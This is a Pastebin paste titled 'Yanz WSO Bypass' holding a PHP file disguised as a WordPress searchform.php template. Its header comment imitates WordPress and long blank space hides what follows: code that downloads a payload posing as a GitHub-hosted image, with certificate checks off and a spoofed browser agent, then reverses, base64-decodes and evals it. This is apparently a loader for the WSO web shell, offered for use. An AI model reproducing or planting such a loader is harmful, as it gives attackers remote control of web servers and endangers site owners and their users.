willysec_id

Yanz WSO Bypass

Jun 7th, 2024
63
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.07 KB | Cybersecurity | 0 0
  1. <?php
  2.  
  3.  
  4. /*
  5.  * The searchform.php template.
  6.  *
  7.  * Used any time that get_search_form() is called.
  8.  *
  9.  * @link https://wordpress.org/themes/template/
  10.  * @package WordPress
  11.  * @subpackage
  12.  * @since 1.0 */
  13.  
  14.  
  15.  
  16.  
  17.  
  18.  
  19.  
  20.  
  21.  
  22.  
  23.  
  24.  
  25.  
  26.  
  27.  
  28.  
  29.  
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  36.  
  37.  
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44.  
  45.  
  46.  
  47.  
  48.  
  49.  
  50.  
  51.  
  52.  
  53.  
  54.  
  55.  
  56.  
  57. $l = "https://user-images.githubusercontent.com/105673502/236584953-2a52fb35-6cd9-437b-8af5-44b8842f540f.jpg"/* "" - ni*/;
  58.  
  59.  
  60. //DX for each form and a string
  61.  
  62.  
  63.        
  64.         if( function_exists('curl_init') ) {
  65.             $ch = curl_init();
  66.             curl_setopt($ch, CURLOPT_URL, $l);
  67.             curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  68.             curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  69.             curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  70.             curl_setopt($ch, CURLOPT_HEADER, FALSE);
  71.             curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36");
  72.             $body = curl_exec($ch);
  73.             curl_close($ch);
  74.         }
  75.         else {
  76.             $body = @file_get_contents($l);        
  77.         }
  78.      eval(base64_decode(strrev($body)));       
  79.  
  80.        
  81.  
  82.  
  83.  
  84.  
  85. ?>
Add Comment
Please, Sign In to add comment